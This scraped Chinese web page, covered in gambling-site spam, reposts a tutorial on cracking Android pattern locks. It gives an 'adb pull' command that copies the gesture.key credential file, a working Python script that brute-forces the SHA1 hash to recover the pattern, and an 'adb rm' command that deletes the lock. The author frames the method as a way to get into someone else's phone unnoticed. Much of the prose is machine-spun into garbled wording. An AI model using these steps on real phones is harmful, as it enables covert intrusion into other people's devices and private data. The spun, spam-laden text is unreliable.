必赢亚洲手机app下载


Android系统手提式有线电话机端抓包方法

366net必赢亚洲手机版营造一个私家云端新闻库

九宫格锁

http://mobile.51cto.com/iphone-441496.htm

安卓手提式有线电电话机的图形锁(九宫格)是3×3的点阵,按次序连接数个点从而完成锁定/解锁的职能。最少供给连接陆个点,最多能连接玖个点。网上也有暴力删除手提式无线电话机图形锁的不二法门,即直接干掉图形锁效能。但一旦你想进入别人的手提式有线电话机,但又不想唤起其警觉的话……你能够参见一下本文。

366net必赢亚洲手机版 1

前提条件:手提式有线电话机须要root,而且打开调节和测试方式。一般来讲,如若用过诸如“豌豆荚手提式有线话机帮手”、“360有线电话帮手”一类的软件,都会被须要打开调节和测试方式的。假若要刨除手提式有线电话机放到软件,则需求将手提式有线电话机root。

原理分析

第1科学普及一下,安卓手提式有线电话机是怎么样标记那捌个点的。通过翻阅安卓系统源码可知,每一个点都有其编号,组成了1个3×3的矩阵,形如:

00 01 02

03 04 05

06 07 08

要是设定解锁图形为1个“L”形,如图:

366net必赢亚洲手机版 2

那么那多少个点的排列顺序是这般的:00 03 06 07
08。系统就记下来了这一串数字,然后将这一串数字(以十六进制的方法)举行SHA1加密,存储在了手提式无线话机里的/data/system/gesture.key
文件中。大家用数据线连接手提式有线电电话机和电脑,然后ADB连接手提式有线电话机,将文件下载到电脑上(命令:adb
pull /data/system/gesture.key gesture.key),如图:

366net必赢亚洲手机版 3

用WinHex等十六进制编辑程序打开gesture.key,会发觉文件内是SHA1加密过的字符串:c8c0b24a15dc8bbfd411427973574695230458f0,如图:

366net必赢亚洲手机版 4

当您下次解锁的时候,系统就比较你画的图腾,看对应的数字串是否0003060708对应的加密结果。假若是,就解锁;不是就此起彼伏维持锁定。那么,如若穷举全数的数字串排列,会有微微呢?联想到高级中学的阶乘,若是用6个点做解锁图形的话,正是9x8x7x6=3024种只怕,那八个点就是15120,伍个点的话60480,四个点181440,八个点362880,柒个点362880。总共是985824种大概性(但如此总结并不连贯,因为同一条直线上的点只可以和他们附近的点相连)。

满打满算,也不到985824种大概。乍一看非常的大,但在处理器前面,穷举出来那个事物用持续几分钟。

破解进程

明白了规律,就出手写程序来促成吗。那里运用了Python来成功职务。首要行使了hashlib模块(对字符串实行SHA1加密)和itertools模块(Python内置,生成00-09的排列组合)。

关键流程为:

1.ADB连连手提式有线电话机,获取gesture.key文件

2.读取key文件,存入字符串str_A

3.生成任何或然的数字串

4.对这么些数字串举办加密,获得字符串str_B

5.将字符串str_A与str_B进行相比较

6.如若字符串A,B相同,则表达数字串num便是想要的解锁顺序

7.打字与印刷出数字串num

366net必赢亚洲手机版,上面为顺序:

# -*- coding: cp936 -*-import itertools
import hashlib
import time
import os

#调用cmd,ADB连接到手机,读取SHA1加密后的字符串
os.system("adb pull /data/system/gesture.key gesture.key")
time.sleep(5)
f=open('gesture.key','r')
pswd=f.readline()
f.close()
pswd_hex=pswd.encode('hex')print '加密后的密码为:%s'%pswd_hex

#生成解锁序列,得到['00','01','02','03','04','05','06','07','08']
matrix=[] 
for i in range(0,9):
    str_temp = '0'+str(i)
    matrix.append(str_temp)#将00——08的字符进行排列,至少取4个数排列,最多全部进行排列

min_num=4
max_num=len(matrix)for num in range(min_num,max_num+1):#从04 -> 08
    iter1 = itertools.permutations(matrix,num)#从9个数字中挑出n个进行排列
    list_m=[]
    list_m.append(list(iter1))#将生成的排列全部存放到 list_m 列表中
    for el in list_m[0]:#遍历这n个数字的全部排列
        strlist=''.join(el)#将list转换成str。[00,03,06,07,08]-->0003060708
        strlist_sha1 = hashlib.sha1(strlist.decode('hex')).hexdigest()#将字符串进行SHA1加密
        if pswd_hex==strlist_sha1:#将手机文件里的字符串与加密字符串进行对比
            print '解锁密码为:',strlist

总结

从程序自己来说,得到解锁密码后应该用break跳出循环并终止程序运营。但Python并不曾跳出多重循环的讲话,假使要跳出多重循环,只好设置标志位然后不停进行判断。为了运营速度就略去了“跳出循环”这几个手续。(有没有更好的贯彻跳出多重循环的艺术?)此外也略去了广大容错语句。从破解指标来说,倘使单单是忘记了和睦的无绳电话机图形锁密码,完全能够用更简便的法子:ADB连接手提式无线电话机,然后“adb
rm
/data/system/gesture.key”删除掉gesture.key文件,此时图形锁就失效了,随意画一下就能解锁。但本文开篇借使的是“为了不被发觉地进来到旁人的无绳电话机里”,所以就有了这篇小说。

最终提3个有惊无险小建议:假使手提式有线电话机已root,还要用“XX手提式有线电话机帮手”,还想设置图形锁的话——在大哥伦比亚大学“设置”选项里,有一个“锁定状态下撤消USB调试情势”(这些名字因手提式有线电话机而异,而且部分有此选项,有的手提式有线电话机就没有),开启此功效之后,在手提式有线电话机锁定状态下就可知预防此类攻击了。此文技术原理很简短,还望各位大大传授些高大上的Python编制程序技巧。

相关文章

No Comments, Be The First!
近期评论
    功能
    网站地图xml地图